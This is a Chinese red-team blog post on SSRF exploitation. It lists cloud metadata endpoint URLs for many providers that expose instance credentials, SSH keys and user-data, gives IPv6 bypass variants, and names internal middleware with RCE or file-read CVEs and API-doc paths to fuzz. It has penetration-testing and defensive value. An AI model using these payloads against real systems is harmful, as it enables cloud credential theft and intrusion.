渗透测试 SSRF SRC 云安全 蓝军

蓝军技巧之SSRF利用方法

Posted by admin on 2022年3月24日 18:38

前言

SSRF漏洞在互联网公司中应该是除了越权之外最普遍的漏洞了。关于漏洞的原理,绕过,传统的扫端口、各种探测等利用方式等就不再赘述,这里分享下自己作为企业蓝军中常用的一些SSRF的利用途径。

0x01 Cloud Metadata

就是各种云上的元数据信息,有些可直接拿到主机权限,有些可获取一些敏感信息。

1.1 AWS

# http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html#instancedata-data-categories
http://169.254.169.254/latest/meta-data/iam/security-credentials/dummy
http://169.254.169.254/latest/user-data
http://169.254.169.254/latest/user-data/iam/security-credentials/[ROLE NAME]
http://169.254.169.254/latest/meta-data/iam/security-credentials/[ROLE NAME]
http://169.254.169.254/latest/meta-data/public-keys/0/openssh-key
http://169.254.169.254/latest/meta-data/public-keys/[ID]/openssh-key

# ECS Task : https://docs.aws.amazon.com/AmazonECS/latest/developerguide/task-metadata-endpoint-v2.html
http://169.254.170.2/v2/credentials/

1.2 Google Cloud

#  https://cloud.google.com/compute/docs/metadata
#  - Requires the header "Metadata-Flavor: Google" or "X-Google-Metadata-Request: True" on API v1
http://169.254.169.254/computeMetadata/v1/
http://metadata.google.internal/computeMetadata/v1/
http://metadata/computeMetadata/v1/
http://metadata.google.internal/computeMetadata/v1/instance/hostname
http://metadata.google.internal/computeMetadata/v1/instance/id
http://metadata.google.internal/computeMetadata/v1/project/project-id
# kube-env; thanks to JackMc for the heads up on this (https://hackerone.com/reports/341876)
http://metadata.google.internal/computeMetadata/v1/instance/attributes/kube-env
# Google allows recursive pulls 
http://metadata.google.internal/computeMetadata/v1/instance/disks/?recursive=true
# returns root password for Google
http://metadata.google.internal/computeMetadata/v1beta1/instance/attributes/?recursive=true&alt=json

1.3 Digital Ocean

# https://developers.digitalocean.com/documentation/metadata/
http://169.254.169.254/metadata/v1.json
http://169.254.169.254/metadata/v1/ 
http://169.254.169.254/metadata/v1/id
http://169.254.169.254/metadata/v1/user-data
http://169.254.169.254/metadata/v1/hostname
http://169.254.169.254/metadata/v1/region
http://169.254.169.254/metadata/v1/interfaces/public/0/ipv6/address

1.4 Packetcloud

https://metadata.packet.net/userdata

1.5 Azure

# https://docs.microsoft.com/en-us/azure/virtual-machines/windows/instance-metadata-service
# Header: "Metadata: true"
# (Old) https://azure.microsoft.com/en-us/blog/what-just-happened-to-my-vm-in-vm-metadata-service/
http://169.254.169.254/metadata/instance?api-version=2017-04-02
http://169.254.169.254/metadata/instance/network/interface/0/ipv4/ipAddress/0/publicIpAddress?api-version=2017-04-02&format=text

1.6 Oracle Cloud

# https://docs.us-phoenix-1.oraclecloud.com/Content/Compute/Tasks/gettingmetadata.htm
http://169.254.169.254/opc/v1/instance/
# https://docs.oracle.com/en/cloud/iaas/compute-iaas-cloud/stcsg/retrieving-instance-metadata.html
http://192.0.0.192/latest/
http://192.0.0.192/latest/user-data/
http://192.0.0.192/latest/meta-data/
http://192.0.0.192/latest/attributes/

1.7 阿里云

# https://www.alibabacloud.com/help/faq-detail/49122.htm
http://100.100.100.200/latest/meta-data/
http://100.100.100.200/latest/meta-data/instance-id
http://100.100.100.200/latest/meta-data/image-id

1.8 OpenStack

# https://docs.openstack.org/nova/latest/user/metadata-service.html
http://169.254.169.254/openstack
http://169.254.169.254/openstack/2012-08-10/meta_data.json
http://169.254.169.254/openstack/2018-08-27/network_data.json

1.9 Kubernetes

# Debug Services (https://kubernetes.io/docs/tasks/debug-application-cluster/debug-service/)
https://kubernetes.default.svc.cluster.local
https://kubernetes.default
# https://twitter.com/Random_Robbie/status/1072242182306832384
https://kubernetes.default.svc/metrics

1.10 腾讯云

# https://cloud.tencent.com/document/product/213/4934
http://metadata.tencentyun.com/latest/meta-data/
http://169.254.0.23/latest/meta-data/
http://100.88.222.5/

1.11 IPv6 Tests

大部分云主机都是支持IPv6的,所以绕过的时候可以尝试下

http://[::ffff:169.254.169.254]
http://[0:0:0:0:0:ffff:169.254.169.254]

1.12 华为云

# https://support.huaweicloud.com/usermanual-ecs/ecs_03_0166.html
http://169.254.169.254/openstack/latest/meta_data.json
http://169.254.169.254/openstack/latest/user_data
http://169.254.169.254/openstack/latest/network_data.json
http://169.254.169.254/openstack/latest/securitykey

0x02 中间件

利用SSRF攻击传统的组件、CMS等的常用途径不再赘述,这里举一些在大部分互联网公司中常用的 能够被SSRF进一步利用的中间件。

2.1 Apollo

利用点:

2.2 Erueka

利用点:

  • 未授权访问
    • Erueka未授权访问漏洞。通过内网Eruaka未授权,可获取到大量注册的应用,若运气好,直接可定位到核心组件和核心服务。

2.3 JumpServer

利用点:

  • RCE:
    • JumpServer远程代码执行漏洞。JumpServer的这个漏洞最开始基本上都是在Nginx层做的拦截,如果直接找到Jumpserver的后端端口,可直接尝试利用漏洞RCE。

2.4 Grafana

利用点:

  • 文件读取
    • CVE-2021-43798任意文件读取。内网的组件大多比较脆弱,直接读Grafana的DB文件,得到的基本上都是比较重要的DB账号密码。

2.5 K8s

利用点:

  • 各种未授权访问
    • 这个比较大,不一一说了,纯属看运气了。比如常见的:API Server / etcd / kubectl proxy / kubelet / Docker Remote API / dashboard等等等

2.6 大数据相关

利用点:

  • 未授权访问
  • 文件读取
  • RCE

大数据生态组件也非常多,大多利用未授权访问、文件读取漏洞进行信息获取,部分可进行RCE。

2.7 SpringBoot Actuator

利用点:

  • 未授权访问:

    • 很多Actuator的端点拦截只是对外网而言,有些是在Nginx过滤了 或者在 filter设置的只允许内部网络访问,通过SSRF就可以直接未授权获取各种数据,直接下载heapdump获取数据。

  • 文件读取:

    • Logview CVE-2021-21234

  • RCE:

    • Gateway SPEL 代码注入 (CVE-2022-22947)
    • 修改env端点属性
      • eureka xstream deserialization
      • SnakeYAML RCE
      • Jolokia Realm JNDI RCE
      • H2 RCE

2.8 内网业务应用

这里有个小技巧,先搞应用的API文档,大部分内网调用的服务很多都不做权限校验的,直接请求接口运气好的直接搞到核心数据

API文档的Fuzz URI

doc.html
swagger-ui.html
swagger/swagger-ui.html
api/swagger-ui.html
api/doc.html
swagger/index.html
druid/index.html
spring-security-rest/api/swagger-ui.html
spring-security-oauth-resource/swagger-ui.html
swagger/v1/swagger.json
swagger/v2/swagger.json
api-docs
v1/api-docs
v2/api-docs
...

2.9 Confluence

利用点:

  • SPEL RCE
    • CVE-2021-26084 Remote Code Execution on Confluence Servers

2.10 Elasticsearch

利用点:

  • 未授权访问:

    • 运气好的直接搞到运维或中间件的ES
      • 是应用ES的话找访问日志的索引和操作日志的索引
      • 是运维ES的话找应用stdout/stderr/logback等的索引

  • RCE:

    • log4j(我不会告诉你 国内TOP3云厂商卖的ES服务还有log4j漏洞呢)

2.11 阿里Druid

利用点:

  • 未授权访问
    • 找URI
    • 找Session
    • 找SQL(往SQL注入靠)

2.12 Apache Druid

利用点:

  • 未授权访问
    • Dashboard
  • 文件读取
    • CVE-2021-36749 Apache Druid LoadData 任意文件读取
  • RCE
    • Apache Druid 远程代码执行漏洞(CVE-2021-26919)
    • 结合未授权 Apache Druid 命令执行漏洞(CVE-2021-25646)

2.13 APISIX

利用点:

  • 未授权访问
    • CVE-2021-45232 APISIX Dashboard未授权访问漏洞

2.14 Jenkins

利用点:

  • 未授权访问
    • Groovy 脚本控制台 RCE
  • RCE
    • CVE-2018-1000861
    • CVE-2019-1003000

后记

前天无意间打开微信公众平台,进去看到加了200多个粉丝,让一年多没更新的我感到无比愧疚,愧对大哥们的关注。其实我笔记里面有非常多想要分享的话题,包括了运维相关、企业架构、蓝军、企业安全建设、云原生、HIDS、NIDS等等(虽然都不咋懂),但是比较忙一直没写,以后尽量一个月搞个3篇以上。

再次谢谢大哥们的厚爱了,大家一块进步呀。